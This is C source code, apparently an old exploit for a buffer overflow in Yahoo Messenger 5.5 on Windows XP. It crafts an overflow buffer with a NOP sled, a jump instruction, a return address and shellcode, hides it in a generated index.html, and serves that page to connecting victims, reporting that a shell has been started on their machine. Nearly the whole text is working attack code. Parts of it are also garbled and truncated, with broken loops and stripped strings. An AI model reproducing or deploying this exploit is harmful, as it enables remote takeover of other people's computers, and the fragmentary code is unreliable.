Remote Yahoo Messenger V5.5 Exploiter
* [ Remote yahoo Messenger V5.5 exploiter on Windows XP ]
* Dtors Security Research (DSR)
* Code by: Rave
* The buffer looks like this
* |
printf("\n\t\t\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: rave@dtors.net\n");
printf("\t\t\n\n");
/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t\n\n");
fprintf(stdout,"\t\tP local webserver server portnumber\n");
fprintf(stdout,"\t\tg greatz to:\n\n\n\n\n");
printf("\t\t\n\n");
}
/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;
for (i=1; i
} else {
fprintf(stderr,"Done\n");
}
// zeroing the buffers in preparation
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
// whe place the a jmp ebp+0x3 instuction inside the buffer
// to jump over the eip changing bytes at the en offset
//
// jmp 0x3
// |____________^
buffer[offset4]=0xeb;
buffer[offset3]=0x03;
memcpy(buffer+offset,sraddress,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));
// here we create index.html;
// we open it again if someone connects to the exploiting server
// and send it over to the victim.
fprintf(fptr,"",0x22,0x22);
fprintf(fptr,"");
fprintf(fptr,"Oohhh my god exploited\n");
fprintf(fptr,"",0x22,0x22);
fprintf(fptr,"");
fprintf(fptr,"",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"Dtors Security Research (DSR)\n");
fprintf(fptr,"Yah000 Messager Version 5.5 exploit....\n");
fprintf(fptr,"");
fprintf(fptr,"Contach
heaven\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"....
\x00\x00\x00",0x22,0x22);
fclose(fptr); //
inet_ntoa(client.sin_addr),he>h_name);
/* prints client's IP */
fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}
fprintf(stdout,"Sending the overflow string... ");
// reading the index.html file and sending its
// contents to the connected victim
while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';
}
send(fd2,sd,strlen(sd),0);
printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s lol\n\n\nPress any key to exit the
exploit",inet_ntoa(client.sin_addr),he>h_name);
gets(sd);
exit(0);
}
return 0;
}